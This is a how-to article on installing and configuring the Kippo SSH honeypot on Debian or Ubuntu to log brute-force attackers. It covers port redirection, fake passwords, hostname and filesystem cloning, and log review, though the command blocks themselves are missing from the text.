Do you ever wanted to monitor the brute-force attacks and know how often the attackers tried to access your server? Well, you’re on the right track. Go on to find out how.
Kippo is a medium interaction SSH honeypot designed to log all brute force attacks and, most importantly, the entire shell interaction performed by the attacker. Kippo has a fake filesystem with ability to add and remove files. So the brute-force attackers will think that they are accessing the right system and start to do some interactions. All the interactions can be logged and we can view them later.
Also we can add some fake contents on the file system so the attacker can view the file contents. But it has a very old contents which can be easily recognized by the attacker. So it is better to clone our current filesystem to kippo filesystem. This can be easily done using Kippo without revealing any important information to the attacker. Kippo stores the logs in an UML compatible format for easy replay with original timings. It saves the files downloaded with wget for later investigation.
Install Kippo On Debian / Ubuntu / Linux Mint
This how-to was tested on Debian 7, although the sames steps are applicable for Ubuntu, Linux Mint etc.
Kippo can be installed on any machine that meets the following requirements.
- An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
- Python 2.5+
- Twisted 8.0+
- PyCrypto
- Zope Interface
Hence Kippo is Python based, Install some necessary Python libraries using the following command. From now on, all commands will be performed by root user.
The above command will install all necessary packages required by Kippo.
Probably all attackers will first try to attack the servers via SSH default port 22. So let us change the SSH port. Use any random number, for example here i use 1984.
To do that, edit file /etc/ssh/sshd_config,
Find the following line and change the default port number.
Save and exit the file. Restart ssh service.
Create a non-privileged user, ex.kippo and kippo under this user.
Now log out and log in back to Kippo user.
Get the latest Kippo package from the project download page.
Extract the tar file using command:
This will create a directory called kippo-0.8 in your current directory.
Kippo directory contains the following contents.
Where,
dl – files downloaded with wget are stored here.
log/kippo.log – log/debug output.
log/tty/ – session logs.
utils/playlog.py – utility to replay session logs.
utils/createfs.py – used to create fs.pickle.
fs.pickle – fake filesystem.
honeyfs/ – file contents for the fake filesystem – feel free to copy a real system here.
The default port of Kippo is 2222. Now, enter the following command to create a new iptables rule to redirect all traffic from SSH port 22 to Kippo port 2222.
Note: Run the above command as root user and then switch back to kippo user.
Start Kippo
Once you done with all configuration, go to the Kippo directory and start it.
Test Kippo Honeypot
After starting kippo, let us ssh to our debian server using command:
The default password for kippo is 123456.
Sample output:
As you see in the above result, the attacker will be able to log in to our Debian server, but only to the fake file system. From here, he can do all interactions like creating, deleting files or folders. But they don’t know they are logged-in to a fake filesystem. How pity!
As i mentioned before, the default kippo password is 123456. Also it is possible to set different passwords.
From your Kippo directory, enter the following commands:
Where,
password, senthil and unixmen are alternative passwords for the root user. The attacker will be able to log in to the honeypot using any of above mentioned passwords with root user.
Miscellaneous
The following tasks are not mandatory. But if you want to trap your attacker more precisely, do the following.
Change hostname:
The default kippo hostname is nas3. If you want to use some real name ex. debian-server, edit kippo.cfg file and change the hostname.
Go to your kippo directory and edit file kippo.cfg,
Find the following line and change hostname as per your like.
When the attacker try to ssh your server, he will be presented with the hostname debian-server.
Change OS name:
Go to kippo directory and edit file /etc/issue,
Change the os name as per your liking.
Clone filesystem:
As i mentioned before, the default kippo filesystem is outdated and it can be easily recognized by the attacker. So go to your kippo directory and clone the current filesystem using the following command with root user:
Don’t forget to stop and start the kippo service after editing the configuration. To stop, the kippo simply kill the process. To find out the kippo process id, enter command:
Sample output:
Now kill it using command:
To start kippo service again, go to your kippo directory and start it with user kippo. As you already know, kippo doesn’t start with root user.
There are more options available to monitor the brute-force attacker. Go through the kippo.cfg file and tweak the settings as per your needs. Also it is advisable to keep the dl directory in a separate directory to save the space. Also you can use mysql database to save the logs.
View logs
Do you curious what did the attacker do in your system? That’s very simple. The logs will be stored in the log folder in the kippo directory.
Go to your kippo directory and view log file as shown below.
Sample output:
Conclusion
However, kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks, as there are no limits on how many people can connect to it, or how many files they can download. So it is recommended to run kippo in a well firewalled Virtual Machine.
What we discussed here is only the installation and some basic configuration. Using Kippo you can learn how the attackers are trying to attack your system and what they trying to do. Later you can harden your servers using the information gathered from attackers.
Good luck!
Reference Links:
Kippo Homepage
---------------------------------------------------------------------
Kippo – A SSH Honeypot To Monitor Brute Force Attacks On Debian 7 / Ubuntu 13.10